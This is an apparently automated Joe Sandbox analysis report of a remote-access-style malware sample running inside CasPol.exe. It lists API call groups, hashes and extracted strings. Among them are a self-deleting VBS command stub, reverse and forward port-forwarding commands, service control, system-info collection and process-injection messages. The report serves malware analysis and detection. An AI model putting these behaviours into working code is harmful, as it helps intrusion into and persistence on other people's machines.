                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                              • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                              • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                              • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                              • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                              APIs
                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                                                                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                              • API String ID: 489098229-65789007
                                                                                                                                                              • Opcode ID: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                                                                                              • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                                                                              • Opcode Fuzzy Hash: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                                                                                              • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                              • API String ID: 1913171305-390638927
                                                                                                                                                              • Opcode ID: dd841bb82cc608f79e660caa83b4a906fc9399d47d9f20e4a7acba44519bdb89
                                                                                                                                                              • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                                                                              • Opcode Fuzzy Hash: dd841bb82cc608f79e660caa83b4a906fc9399d47d9f20e4a7acba44519bdb89
                                                                                                                                                              • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                              • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                                                                                                              • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                                                                              • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                                                                                                              • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454A96
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454C58
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                              • String ID: H
                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                              • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                                                                              • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                                                                              • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                                                                              • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 65535$udp
                                                                                                                                                              • API String ID: 0-1267037602
                                                                                                                                                              • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                                              • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                                                                              • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                                              • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                                                                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                                                                              • _free.LIBCMT ref: 0043946A
                                                                                                                                                              • _free.LIBCMT ref: 00439471
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2441525078-0
                                                                                                                                                              • Opcode ID: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                                                                                              • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                                                                              • Opcode Fuzzy Hash: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                                                                                              • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                                                                              APIs
                                                                                                                                                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                              • API String ID: 2956720200-749203953
                                                                                                                                                              • Opcode ID: 18875f9c50a8bcefbb1e00b514f96bad7d70b682c79a56d8248145d959058f72
                                                                                                                                                              • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                                                                              • Opcode Fuzzy Hash: 18875f9c50a8bcefbb1e00b514f96bad7d70b682c79a56d8248145d959058f72
                                                                                                                                                              • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(000002D4,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                              • String ID: <$@$@FG$@FG$Temp
                                                                                                                                                              • API String ID: 1107811701-2245803885
                                                                                                                                                              • Opcode ID: 78bafc74c7007505e7acf19461ea602378d21729afb86ac299e4c8e7541a188c
                                                                                                                                                              • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                                                                              • Opcode Fuzzy Hash: 78bafc74c7007505e7acf19461ea602378d21729afb86ac299e4c8e7541a188c
                                                                                                                                                              • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                              APIs
                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                              • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                                                                              • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                                                                              • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                                                                              • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 00446DDF
                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                              • _free.LIBCMT ref: 00446DEB
                                                                                                                                                              • _free.LIBCMT ref: 00446DF6
                                                                                                                                                              • _free.LIBCMT ref: 00446E01
                                                                                                                                                              • _free.LIBCMT ref: 00446E0C
                                                                                                                                                              • _free.LIBCMT ref: 00446E17
                                                                                                                                                              • _free.LIBCMT ref: 00446E22
                                                                                                                                                              • _free.LIBCMT ref: 00446E2D
                                                                                                                                                              • _free.LIBCMT ref: 00446E38
                                                                                                                                                              • _free.LIBCMT ref: 00446E46
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                              • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                                                                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                              • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                                                                              APIs
                                                                                                                                                              • _free.LIBCMT ref: 100059EA
                                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                              • _free.LIBCMT ref: 100059F6
                                                                                                                                                              • _free.LIBCMT ref: 10005A01
                                                                                                                                                              • _free.LIBCMT ref: 10005A0C
                                                                                                                                                              • _free.LIBCMT ref: 10005A17
                                                                                                                                                              • _free.LIBCMT ref: 10005A22
                                                                                                                                                              • _free.LIBCMT ref: 10005A2D
                                                                                                                                                              • _free.LIBCMT ref: 10005A38
                                                                                                                                                              • _free.LIBCMT ref: 10005A43
                                                                                                                                                              • _free.LIBCMT ref: 10005A51
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                              • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                              • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                              • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Eventinet_ntoa
                                                                                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                                              • API String ID: 3578746661-4192532303
                                                                                                                                                              • Opcode ID: 4c17f49e2ea71309f98003053e30d2164bba13b43e4e92de7a9c6e0508004ea1
                                                                                                                                                              • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                                                                              • Opcode Fuzzy Hash: 4c17f49e2ea71309f98003053e30d2164bba13b43e4e92de7a9c6e0508004ea1
                                                                                                                                                              • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                                                                              APIs
                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                                                                              • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                                                                              • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                                                                              • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                                                                              • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                                                                              APIs
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                              • API String ID: 1462127192-2001430897
                                                                                                                                                              • Opcode ID: cbb48963e8b1355fd2af9712d613811fc1a0336ec70d383140689dfc29f025ae
                                                                                                                                                              • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                                                                              • Opcode Fuzzy Hash: cbb48963e8b1355fd2af9712d613811fc1a0336ec70d383140689dfc29f025ae
                                                                                                                                                              • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00474A28,00000000,?,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
